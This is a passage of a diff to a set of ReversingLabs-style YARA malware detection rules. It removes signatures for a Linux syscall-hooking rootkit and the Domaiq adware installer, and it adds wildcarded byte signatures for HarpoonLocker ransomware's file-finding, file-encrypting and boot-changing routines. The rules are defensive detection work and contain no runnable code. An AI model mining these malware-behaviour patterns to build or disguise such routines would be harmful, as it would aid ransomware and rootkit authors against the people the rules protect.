-            31 C0 E9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 C7 C6 ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? BE ?? ?? ?? ?? 31 D2 48 63 F6 89 94 B5 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? C1 E2 ?? C1 E0 ?? 09 C2 8B 85 ?? ?? ?? ?? 0B 95 ?? ?? ?? ?? C1 E0 ??
-            09 C2 0F 84
+		$encrypt_files = {
+            14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73 ??
+            ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
+            03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
+            09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16 02
+            8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DD ?? ?? ?? ?? 11 ?? 38 ?? ?? ?? ??
+            38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 08 6F ?? ?? ?? ?? 0A 00 DD ??
+            ?? ?? ?? 09 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 DC 00 DD
+            ?? ?? ?? ?? 08 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 39 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 00 DC 06
+            13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 11 ?? 2A
         }
-		$hook_gdents64 = {
-            E8 ?? ?? ?? ?? 55 48 89 E5 41 57 41 56 41 55 41 54 53 48 83 EC ?? 48 8B 47 ?? 4C 8B
-            6F ?? 48 89 45 ?? 48 8B 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 63 D8 89 45
-            ?? 49 89 C4 48 89 DF E8 ?? ?? ?? ?? 48 89 45 ?? 45 85 E4 7E ?? 48 85 C0 74 ?? 48 89
-            C7 31 D2 48 89 DE 49 89 C6 E8 ?? ?? ?? ?? 48 8B 75 ?? 48 89 DA 4C 89 F7 E8 ?? ?? ??
-            ?? 49 89 C4 48 85 C0 74 ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 48 83 C4 ?? 48 89 D8 5B 41 5C
-            41 5D 41 5E 41 5F 5D E9 ?? ?? ?? ?? 44 89 EF 48 C7 C3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            C7 45 ?? ?? ?? ?? ?? 89 45 ?? EB ?? 8B 45 ?? 85 C0 74 ?? 4C 89 75 ?? 41 0F B7 46 ??
-            4C 63 6D ?? 49 01 C4 4D 39 EC 0F 83 ?? ?? ?? ?? 48 8B 45 ?? 83 7D ?? ?? 4E 8D 34 20
-            75 ?? 4D 89 F5 49 83 C5 ?? 0F 84 ?? ?? ?? ?? 49 C7 C7 ?? ?? ?? ?? EB ?? 49 83 C7 ??
-            4C 39 FB 74 ?? 41 80 3F ?? 74 ?? 4C 89 EE 4C 89 FF E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B
-            45 ?? 49 39 C6 74 ?? 48 8B 4D ?? 41 0F B7 46 ?? 66 01 41 ?? EB ?? 49 83 FE ?? 74 ??
-            41 81 7E ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 45 ?? 49 39 C6 75 ?? 0F B7 50 ?? 29
-            55 ?? 48 89 C7 4C 63 6D ?? 48 8D 34 10 4C 89 EA E8 ?? ?? ?? ?? 4D 39 EC 0F 82 ?? ??
-            ?? ?? 4C 89 EB 49 81 FD ?? ?? ?? ?? 77 ?? 4C 8B 75 ?? 4C 89 EE BA ?? ?? ?? ?? 4C 89
-            F7 E8 ?? ?? ?? ?? 48 8B 7D ?? 4C 89 EA 4C 89 F6 E8
+		$find_files = {
+            16 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            0C 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 06 72 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ??
+            ?? ?? ?? 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17
+            28 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ??
+            00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69
+            FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ??
+            ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ??
+            ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11
+            ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ??
+            6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ??
+            ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ??
+            16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ??
+            ?? ?? 3A ?? ?? ?? ?? 2A
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( all of ( $hooking_syscalls_mechanism_p* ) ) and ( all of ( $hook_rmdir_* ) ) and ( $hook_gdents64 )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files )
 }
-rule REVERSINGLABS_Win32_PUA_Domaiq : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Harpoonlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Domaiq potentially unwanted application."
+		description = "Yara rule that detects HarpoonLocker ransomware."
 		author = "ReversingLabs"
-		id = "44129e4b-7dc2-5af0-b466-80dc4f4d6388"
-		date = "2020-07-28"
-		modified = "2020-07-28"
+		id = "3605d354-5a33-54b1-83ad-ad514c78357b"
+		date = "2022-01-27"
+		modified = "2022-01-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/pua/Win32.PUA.Domaiq.yara#L1-L169"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.HarpoonLocker.yara#L1-L96"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e291a639aa027a2257eec2853e40a222afabf23b32898326a1d5b48be823202c"
+		logic_hash = "20587f9dce5981934498d9979843a090224ba649def8b694adf7799b7060cc25"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "PUA"
-		tc_detection_name = "Domaiq"
-		tc_detection_factor = 1
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HarpoonLocker"
+		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$payload = "PEFxdWlFbXBpZXphRWxQYXlsb2FkPg"
-		$NSIS_CheckIntegrity = {
-            57 53 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? 00 75 ?? 6A 1C 8D 45
-            D8 53 50 E8 ?? ?? ?? ?? 8B 45 D8 A9 F0 FF FF FF 75 ?? 81 7D DC EF BE AD DE 75 ?? 81
-            7D E8 49 6E 73 74 75 ?? 81 7D E4 73 6F 66 74 75 ?? 81 7D E0 4E 75 6C 6C 75 ?? 09 45
-            08 8B 45 08 8B 0D ?? ?? ?? ?? 83 E0 02 09 05 ?? ?? ?? ?? 8B 45 F0 3B C6 89 0D ?? ??
-            ?? ?? 0F 8F ?? ?? ?? ?? F6 45 08 08 75 ?? F6 45 08 04 75
-        }
-		$NSIS_ErrorPart = {
-            81 EC ?? ?? ?? ?? 53 55 56 33 DB 57 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 33 F6 C6 44
-            24 ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A
-            ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 8D 44 24 ?? 68 ?? ?? ?? ?? 50 53
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? BF ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 80 3D ?? ?? ??
-            ?? ?? A3 ?? ?? ?? ?? 8B C7 75
-        }
-		$UPX_Decompression = {
-            8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? B8 ?? ?? ?? ?? 01 DB 75 ??
-            8B 1E 83 EE ?? 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? 48 01 DB 75
-        }
-		$UPX_Encrypting = {
-            31 C0 8A 07 30 D8 04 ?? 2C ?? 88 07 47 39 CF 75
-        }
-		$dumping_functionv2014 = {
-            55 8B EC 83 EC ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84
-            ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            89 45 ?? 85 C0 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 74 ?? 8B 45 ??
-            53 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ??
-            56 6A ?? 6A ?? 8B D8 6A ?? 53 FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 57 6A ?? 6A ?? 6A
-            ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 8B F8 52 57 E8 ?? ?? ?? ?? 83 C4
-            ?? 57 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 53 FF D6 5F 5B 5E 8B E5 5D C3
-        }
-		$dumping_functionMidVersion = {
-            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 68 ?? ?? ?? ?? 33
-            DB BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 45 ?? 89 75 ?? 89 5D ?? 88 5D ?? FF 15 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F8 8B CF 8D 41 ?? 8A 11 41 3A
-            D3 75 ?? 2B C8 51 57 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ??
-            83 EC ?? 8B CC 89 65 ?? 6A ?? 89 71 ?? 89 59 ?? 68 ?? ?? ?? ?? 88 59 ?? E8 ?? ?? ??
-            ?? 83 EC ?? 8B CC 89 65 ?? 6A ?? 53 8D 55 ?? 89 71 ?? 89 59 ?? 52 88 59 ?? E8 ?? ??
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B CC 89 65 ?? 6A ?? 89 71 ?? 89 59 ?? 68 ?? ??
-            ?? ?? 88 59 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 89 65 ?? 6A ?? 53 8D 45 ?? 89 71 ?? 89
-            59 ?? 50 88 59 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B CC 89 65 ?? 6A ??
-            89 71 ?? 89 59 ?? 68 ?? ?? ?? ?? 88 59 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 89 65 ?? 6A
-            ?? 53 8D 55 ?? 89 71 ?? 89 59 ?? 52 88 59 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 8B C4 89 65 ?? 68 ?? ?? ?? ?? 8D 4D ?? 51 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
-            ?? ?? 8B 7D ?? BE ?? ?? ?? ?? 83 C4 ?? 39 75 ?? 73 ?? 8D 7D ?? 68 ?? ?? ?? ?? 8D 55
-            ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 40 ?? EB ?? 83 C0 ?? 8B
-            4D ?? 57 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 39 75 ?? 72 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83
-            C4 ?? 39 75 ?? 72 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 5F 5E 33 CD 33 C0
-            5B E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$dumping_functionE = {
-            52 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 5? FF 15 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ?? FF 15 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 83 BD ?? ?? ?? ?? ?? 75 ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ??
-            ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52
-            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF
-            15 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 51 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8
-        }
-		$dumping_functionP = {
-            50 57 56 FF 15 ?? ?? ?? ?? 8B F8 57 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 57 56
-            89 45 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF
-            ?? ?? ?? ?? 57 56 68 ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 6A
-            ?? 56 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56 8B D8 8D 45 ?? 50 FF 75 ?? 89 75 ??
-            FF 75 ?? 53 FF 15 ?? ?? ?? ?? 53 FF 15
-        }
-		$dumping_functionB = {
-            52 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7
-            85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ??
-            ?? ?? ?? F3 A5 A4 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? F3 A5 A4
-            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B 95
-            ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ??
-            ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 51 8B CC 89 A5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? E8
-        }
-		$dumping_function111 = {
-            68 ?? ?? ?? ?? 8D 55 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 39 58 ?? 72 ?? 8B 40 ?? EB
-            ?? 83 C0 ?? 50 6A ?? 8D 4D ?? E8 ?? ?? ?? ?? 39 5D ?? 72 ?? 8B 55 ?? 52 E8 ?? ?? ??
-            ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 E8
-        }
-		$dumping_function2 = {
-            55 8B EC 51 53 8B 5D ?? 56 68 ?? ?? ?? ?? 8D 45 ?? 53 50 33 F6 E8 ?? ?? ?? ?? 8B 4D
-            ?? 68 ?? ?? ?? ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            83 F8 ?? 74 ?? 57 8B 7D ?? 0F BE 14 3E 8B 4D ?? 51 33 D0 52 E8 ?? ?? ?? ?? 8B C7 83
-            C4 ?? 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B C2 8D 4E ?? 8B D1 2B D0
-            8B 45 ?? F7 DA 1B D2 23 D1 50 8B F2 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 5F 8B 4D
-            ?? 51 E8 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 5E 5B 8B
-            E5 5D C2
-        }
-		$lib_loader = {
-            68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 A3 ?? ??
-            ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 33 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57
+		$encrypt_files_p1 = {
+            7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 14 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 25 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 6F
+            ?? ?? ?? ?? 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 73 ?? ?? ?? ?? 25 06 07 9A 7D
+            ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ?? ?? 26 07 17 58 0B 07 06 8E
+            69 32 ?? 7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 73 ?? ?? ?? ?? 0D
+            09 12 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 09 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 09 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ??
+            ?? 26 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 12 ??
+            12 ?? 28 ?? ?? ?? ?? 12 ?? 12 ?? 28 ?? ?? ?? ?? 11 ?? 11 ?? 59 13 ?? 72 ?? ?? ?? ?? 11
+            ?? 8C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 2C ?? 20 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 2B ?? 2A
         }
-		$exception1 = {
-            B8 ?? ?? ?? ?? 50 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 33 C0 89 08
+		$encrypt_files_p2 = {
+            12 ?? FE 15 ?? ?? ?? ?? 12 ?? FE 15 ?? ?? ?? ?? 12 ?? FE 15 ?? ?? ?? ?? 02 16 12 ?? 28
+            ?? ?? ?? ?? 26 08 7B ?? ?? ?? ?? 0D 08 7B ?? ?? ?? ?? 20 ?? ?? ?? ?? 35 ?? 08 7B ?? ??
+            ?? ?? 16 36 ?? DD ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 72
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 10 ?? 03 03 6F ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
+            13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 03 6F ?? ?? ?? ?? 16 11 ?? 16 1F ?? 28 ?? ?? ?? ?? 03
+            6F ?? ?? ?? ?? 16 11 ?? 1F ?? 1F ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 1F ?? 6A
+            13 ?? 17 13 ?? 09 6E 13 ?? 2B ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 59 13 ?? 11 ?? 11 ?? 30
+            ?? 02 19 17 7E ?? ?? ?? ?? 19 20 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ??
+            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ?? 11 ?? 7E ?? ?? ?? ?? 1A 16 09 20 ??
+            ?? ?? ?? 58 14 28 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ??
+            06 1F ?? 16 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ??
+            DD ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 26 16 13 ?? 16 13 ?? 2B ?? 11 ?? 20 ?? ?? ?? ?? 2F
+            ?? 09 6E 11 ?? 6A 59 13 ?? 11 ?? D4 8D ?? ?? ?? ?? 13 ?? 11 ?? 17 58 11 ?? 33 ?? 11 ??
+            D4 8D ?? ?? ?? ?? 13 ?? 07 11 ?? 28 ?? ?? ?? ?? 11 ?? 16 11 ?? 8E 69 28 ?? ?? ?? ?? 11
+            ?? 18 5D 2D ?? 11 ?? 8E 69 1F ?? 33 ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 16 07 11
+            ?? 28 ?? ?? ?? ?? 11 ?? 8E 69 28 ?? ?? ?? ?? 11 ?? 11 ?? 8E 69 58 13 ?? 11 ?? 17 58 13
+            ?? 11 ?? 11 ?? 3F ?? ?? ?? ?? 11 ?? 20 ?? ?? ?? ?? 32 ?? 11 ?? 16 07 09 28 ?? ?? ?? ??
+            11 ?? 8E 69 28 ?? ?? ?? ?? 2B ?? 11 ?? 16 07 11 ?? 28 ?? ?? ?? ?? 11 ?? 8E 69 28 ?? ??
+            ?? ?? DE ?? 26 DE ?? 26 DE ?? 00 07 28 ?? ?? ?? ?? 26 DE ?? 26 DE ?? 00 06 28 ?? ?? ??
+            ?? 26 DE ?? 26 DE ?? DC 2A
         }
-		$exception2 = {
-            55 53 51 57 56 52 8D 98 ?? ?? ?? ?? 8B 53 ?? 52 8B E8 6A ?? 68 ?? ?? ?? ?? FF 73 ??
-            6A ?? 8B 4B ?? 03 CA 8B 01 FF D0
+		$find_files = {
+            73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 7E ?? ?? ?? ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 2C ?? 2A 00 06 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ??
+            ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 14 0B 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B DE ?? 26
+            DE ?? 07 2C ?? 07 8E 16 FE 01 2B ?? 17 0C 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 16 13
+            ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 08 2C ?? 11 ?? 7B ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 14 28 ?? ?? ?? ??
+            26 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 26 DE ?? 08 2C ?? DD ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 17
+            6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 07 13 ?? 16 13 ?? 2B ?? 73 ?? ?? ??
+            ?? 13 ?? 11 ?? 11 ?? 11 ?? 9A 7D ?? ?? ?? ?? 11 ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ??
+            7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 7E ?? ?? ?? ?? 11 ?? FE 06 ??
+            ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 11 ?? 7B ?? ?? ?? ?? 09 28 ?? ?? ?? ?? DE
+            ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 09 6F ?? ?? ?? ?? DE ?? 26 DE
+            ?? DE ?? 26 DE ?? 2A
         }
-		$exceptionallock = {
-            B8 ?? ?? ?? ?? 8D 88 ?? ?? ?? ?? 89 41 ?? 8B 54 24 ?? 8B 52 ?? C6 02 ?? 83 C2 ??
-            2B CA 89 4A ?? 33 C0 C3
+		$change_boot = {
